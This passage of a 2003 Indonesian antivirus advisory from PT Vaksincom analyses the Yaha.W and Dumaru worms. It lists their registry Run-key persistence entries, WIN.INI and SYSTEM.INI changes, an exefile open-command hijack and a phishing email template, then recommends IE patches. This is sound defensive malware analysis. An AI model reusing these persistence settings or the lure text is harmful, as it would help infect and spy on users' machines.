Perintah tersebut akan memasukkan file benar.reg (yang telah kita buat sebelumya) ke dalam registry). Dengan cara ini data registry telah kita pulihkan. Kemudian kita dapat menjalankan pembersihan dengan menggunakan antivirus dengan update definisi terakhir.

Memang ini adalah salah satu cara untuk mengatasi keadaan demikian, mungkin dengan cara kita merestore registry lama kita dengan menggunakan scanreg. Scanreg kita jalankan  dan tambahkan sebuah parameter  /restore. Program scanreg akan me-restore data registry dari file CAB yang sudah dibentuk sebelumnya. Dan cara-cara lainnya. Ini berlaku untuk Window 9x

Untuk cara perbaikan lainnya anda dapat membaca artikel yang disajikan oleh Tim Technical Support VaksinCom pada alamat link http://www.vaksin.com/clean_swen.htm

Virus lainnya yang menjadi perhatian dari kami adalah YAHA dan DUMARU

WORM YAHA.W

W32/Yaha-W adalah salah satu virus worm yang penyebarannya melalui email dan menggunakan SMTP miliknya sendiri ke semua alamat email yang didapatnya dari komputer yang telah terinfeksi misalnay dari the Windows Address Book dan mencoba mengcopykan dirinya pada komputer yang terhubung dalam sebuah jaringan, pada folder yang memakai nama \Windows, \Win9x, \WinNT, \WIN, \WINME, \WINXP.

Worm ini mengcopykan dirinya pada folder C:\Windows sebagai sebuah file yang bernama REGE32.EXE dan pada folder C:\Windows\System sebagai sebuah file yang bernama EXELD32.EXE dan EXPLORERE.EXE. worm ini juga membuat 2 value registri yang baru yang selalu akan mengaktfkan dirinya setiap kali windows di startup :

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
MicrosoftServiceManager = \EXPLORERE.EXE

dan

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\
MicrosoftServiceManager = \EXPLORERE.EXE

Dan virus ini juga menambahkan sebuah command line pada file WIN.INI

[WINDOWS]
run=REGE32.EXE

yang membuat virus ini semakin rumit di dalam komputer yang sudah terinfeksi adalah, ia mematikan semua proses yang diperlukan, misalnya :

1. Mencari dan memantau pada window yang sedang aktif, dan jika ada nama yang berisi nama sebuah proses yang sudah disiapkan maka tidak lama kemudian proses ini akan dimatikan, contohnya adalah :

   Windows Task Manager

   System Configuration Utility

   Registry Editor

   Process Viewer

2. Mencoba untuk menghapus file-file di bawah ini :

   %System%\WinServices.exe

   %System%\nav32_loader.exe

   %System%\tcpsvs32.exe

   %System%\syshelp.exe

   %System%\WinGate.exe

   %System%\WinRpcsrv.exe

   %System%\winmgm32.exe

   %Windir%\SNTMLS.DAT

3. Menghapus values pada file registry :
   
   WinServices
   syshelp
   WinGate initialize
   Module Call initialize
   WindowsMGM
   
   Dari registry key:
   
   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
4. Menghapus value: WinServices
   
   Dari registry key:
   
   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

Virus ini juga memblok semua program yang dijalankan menggunakan file executable EXE, dengan cara, mengaturnya melalui registry key  

HKEY_CLASSES_ROOT\exefile\shell\open\command    menjadi

"%System%\EXELD32.EXE""%1"%*

Jadi semua file EXE akan diblok dan hanya menjalankan file EXELD32.EXE yang ada pada folder C:\Windows\System.

Dan yang membuat semakin parah adalah, virus ini akan menghapus semua antivirus dan system sekurity yang ada di dalam komputer terinfeksi.

Oleh sebab itu kamii sarankan kepada anda untuk berhati-hati dalam menerima semua email yang mengandung lampiran. Kebiasaan kita adalah setiap ada lampiran langsung kita buka/jalankan, tanpa kita tahu apakah file tersebut mengandung virus atau tidak. Kebiasaan ini sering kali ditemukan hampir di semua para pemakai komputer. Dan tidak menyadari bahwa kebiasaan tersebut sangat berbahaya.

Dumaru.A

W32/Dumaru-B adalah sebuah worm yang menyerang melalui email dan mempunyai fungsi sebagai backdoor. Worm ini sampai pada email anda dengan message seperti di bawah ini :

From: security@...
Subject line: Use this patch immediately !
Message text: Dear friend , use this Internet Explorer patch now!
There are dangerous virus in the Internet now!
More than 500.000 already infected!
Attached file: patch.exe

Setelah attach file dijalankan ia akan mencopykan dirinya menjadi beberapa buah file yang bernama dllreg.exe pada folder C:\Windows, load32.exe dan vxdmgr.exe pada folder C:\Windows\system dan pada folder startup sebagai rundllw.exe. Worm ini juga membuat sebuah file yang bernama guid32.dll pada folder C:\Windows. File Guid32.dll ini  memonitor program yang dijalankan, hentakan keyboard dan mengumpulkan semua informasi yang didapat mengenai komputer korban di dalam sebuah file yang bernama vxdload.log dan terletak pada folder C:\windows. Worm ini juga mencatat  semua informasi yang ada di dalam file winload.log di folder Windows. Setelah itu log tersebut di upload ke sebuah remote FTP server. Selain itu virus ini juga membuat sebuah value yang baru di registri yang akan membuat dirinya selalu aktif jika windows startup :

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\load32 = load32.exe

Selain itu ia juga membuat sebuah tanda bahwa komputer ini telah terinfeksi :

HKLM\Software\SARS\kwmfound

Worm ini juga membuat perubahan pada file Win.ini dan System.ini dengan menambahkan sebuah command line (ini hanya dilakukan pada System Windows 95/98/Me :

[windows]

run=%Windir%\dllreg.exe

[boot]

shell=explorer.exe %System%\vxdmgr32.exe

Yang berbahaya adalah virus ini dapat menjadi sebuah virus Trojan/Backdoor yang menaruh sebuah file dan menjalankannya pada folder C:\Windows\windrive.exe. File ini dikenal sebagai sebuah backdoor Trojan - Troj/Small-G. Virus ini juga mematikan beberapa proses yang dibutuhkan untuk menjalankan komputer seperti REGEDIT, SYSEDIT, program security  ZONEALARM.EXE

BAGAIMANA KASUS VIRUS PADA BULAN SEPTEMBER DI INDONESIA ?

Di indonesia ternyata masih dikuasai oleh beberapa virus-virus lama seperti Redlof, Klez, dan Lovelorn. Tidak seperi bulan lalu, Blaster.A, W32/Sobig.F@mm, Nachi.A, Mimail merajarela dan setelah VAKSINCOM melakukan gerakan Kembalikan Bandwidthku Padaku yang bekerja sama dengan ICT Watch, dan penyuluhan yang tidak henti-hentinya dalam menghadapi virus-virus tersebut, maka dampaknya dapat dilihat berkurangnya serangan-serangan dari virus-virus tersebut. Dan yang muncul adalah virus-virus lama yang mengambil alih singasana penyebaran yang terbesar. Dan kenyataannya ketiga virus-virus tersebut memang agak sangat sulit untuk membasminya, jika kita tidak melakukannya dengan prosedur yang benar. Antivirus akan mencegah, tetapi semua kembali lagi kepada para pemakai komputer. Apakah ada kesadaran dalam ikut membasmi virus-virus lama tersebut. Untuk virus Lovelorn, ia datang ke komputer anda melalui email yang mengandung virus tersebut. Kita klik attach langsung virus itu akan berjangkit. Begitu juga dengan virus-virus lainnya. Ada kecenderungan para pengguna komputer akan merasakan bahwa antivirus hanya sebuah program yang tidak berguna. Mereka mematikan On Access Scanner / Vshield yang seharusnya memantau gerakan penginfeksian yang akan dilakukan oleh virus tersebut. Banyak yang mengatakan bahwa antivirus hanya memakan memori saja. Lebih baik dimatikan, kemudian mereka dapat menjalankan aplikasi lain, misalnya game/permainan atau hal-hal yang tidak perlu. Ini adalah kendala yang sering ditemukan pada para pemakai komputer dengan performa yang pas-pasan. Dan kalau anda memakai produk antivirus Norman Virus Control, anda tidak akan merasakan bahwa banyak sekali memori yang dipakai. Karena Norman Virus Control tidak memerlukan memori yang banyak dalam kinerjanya, mungkin anda merasakan kalau memakai produk antivirus lainnya.

Bagaimana dengan bulan Oktober 2003 nanti ? Mungkinkah ada sebuah atau lebih virus yang berbahaya yang melebihi bulan-bulan sebelumnya ? Kemungkinan tersebut mungkin saja terjadi, karena sudah banyak cara yang dipakai dalam menyerang komputer anda, dan kemudian mematikan proses yang sedang berjalan. Yang menjadi trend mungkin adalah pengambil alihan system komputer kita sehingga kita benar-benar tidak dapat menggunakan komputer tersebut sama sekali. Semoga saja hal ini tidak terjadi, karena akan semakin memusingkan para pengguna komputer, terutama kami dari VAKSINCOM J

Marcel Glenn

Technical Support PT VAKSINCOM

(yang sedang mikirin besok ada virus yang ganas ngga yah)

Update Kumulatif untuk IE 5.01, 5.5 dan 6.0    9 Oktober 2003

Microsoft telah mempublikasikan sebuah update kumulatif untuk semua Internet Explorer denagn ver 5.01, 5.5 dan 6.0, dimana termasuk di dalamnya semua patch-patch sebelumnya dan menjawab 2 buah cacat (celah keamanan) baru yang cukup kristis.

Celah keamanan pertama terjadi karena Internet Explorer tidak dengan tepat menentukan sebuah type object datang kembali melalui web server dalam bentuk pop-up window. Cacat ini mengizinkan seorang penyusup untuk menjalankan kode di dalam sebuah system dengan mudah. Celah keamanan ini dapat tereksploit ketika seorang user menerima sebuah kode perusak dalam bentuk HTML-email

Yang kedua terjadi karena Internet Explorer tidak dengan tepat menentukan sebuah type object datang kembali melalui web server dalam bentuk data XML. Sama seperti point pertama, celah keamanan ini dapat tereksploit ketika seorang user menerima sebuah kode perusak dalam bentuk HTML message untuk menjalankan sebuah code pada system yang tersusupi.

Patch ini ditujukan untuk semua para pemakai Internet Explorer dengan persyaratan sebagai berikut:

(anda dapat mendownload file-file tersebut)

Internet Explorer 6 Service Pack 1

- Windows 2000 SP4

- Windows 2000 SP3

- Windows 2000 SP2

- Windows NT® 4.0 SP6A

- Windows Millennium Edition (Windows ME)

- Windows 98 SE

alamat download : ftp://ftp.cbn.net.id/Vaksin/Patch/for_IE/IE_6_SP1/q828750.exe

Internet Explorer 6

- Windows XP SP1

- Windows XP

alamat download : ftp://ftp.cbn.net.id/Vaksin/Patch/for_IE/IE_6_XP/q828750.exe

Internet Explorer 5.5 Service Pack 2

- Windows 2000 SP4

- Windows 2000 SP3

- Windows 2000 SP2

- Windows NT® 4.0 SP6A

- Windows Millennium Edition (Windows ME)

- Windows 98 SE

alamat download : ftp://ftp.cbn.net.id/Vaksin/Patch/for_IE/IE_55_SP2/q828750.exe

Internet Explorer 5.01 Service Pack 3

- Windows 2000 SP3

dan

Internet Explorer 5.01 Service Pack 4

- Windows 2000 SP4

alamat download : ftp://ftp.cbn.net.id/Vaksin/Patch/for_IE/IE_501_2K_SP3_SP4/q828750.exe

Berita terkait :

http://www.microsoft.com/security/security_bulletins/ms03-040.asp

PT. Vaksincom menyarankan anda mendownload dan segera menjalankan Service Pack tersebut di atas untuk melindungi komputer anda dari semua serangan yang kemungkinan akan terjadi di masa depan, dimana menurut data yang kami miliki sampai saat ini > 50 % komputer masih belum melakukan update dan rentan terhadap eksploitasi Iframe exploit dimana sebuah virus akan mampu menjalankan dirinya secara otomatis tanpa perlu di klik karena adanya celah keamanan ini.

Bagi para kontributor, kami harapkan untuk mendownload pada link tersebut di atas dan menyebarkan informasi ini ke para pengguna internet. Pelanggan PT. Vaksincom yang mengalami kesulitan mendownload Servicepack ini dapat menghubungi support@... untuk mendapatkan kunjungan langsung dari team Teknikal Support dan Free update Service Pack.

salam,

PT. Vaksincom